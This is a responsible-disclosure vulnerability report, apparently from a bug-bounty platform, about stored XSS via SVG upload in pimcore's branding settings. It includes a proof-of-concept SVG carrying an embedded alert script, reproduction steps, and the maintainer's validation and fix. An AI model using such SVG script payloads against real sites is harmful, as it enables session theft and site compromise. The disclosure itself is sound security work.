Unrestricted Upload of File with Dangerous Type in pimcore/pimcore

Valid

Reported on

Jan 17th 2022

Description

The pimcore/pimcore package is an open source platform that provides PIM, MDM, CDP, DAM, DXP/CMS and digital commerce services. You can upload an infinite number of dangerous SVG files in "Settings" => "System Settings" => "Appearance and Branding" of the pimcore service. Then why is it dangerous? This is because when reading the upload file, it is read as raw data.

Proof of Concept

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script>alert(document.domain)</script>
</svg>

1. Open the https://10.x-dev.pimcore.fun/admin/login?perspective=
2. After login, Go to "Settings" => "System Setting" => "Appearance & Branding"
3. Upload a SVG fille using the Custom Logo Logic
4. Open the url of svg file

Video : https://www.youtube.com/watch?v=BwuR0aHCMFY

Impact

Through this vulnerability, an attacker is capable to execute malicious scripts.

Occurrences

I am sorry. I couldn't find a code..

We are processing your report and will contact the pimcore team within 24 hours. a year ago
Pocas modified the report
a year ago
Bernhard Rusch validated this vulnerability a year ago
Pocas has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bernhard Rusch
a year ago

Maintainer

A very uncertain case ... as this functionality is anyway just set by an administrator and you have to call the image URL explicitly.

Anyway, I've provided a fix.

Pocas
a year ago

Researcher

I agree on that part. thank you.

Bernhard Rusch marked this as fixed in 10.2.7 with commit 35d185 a year ago
Bernhard Rusch has been awarded the fix bounty
This vulnerability will not receive a CVE
Dao.php#L2 has been validated
to join this conversation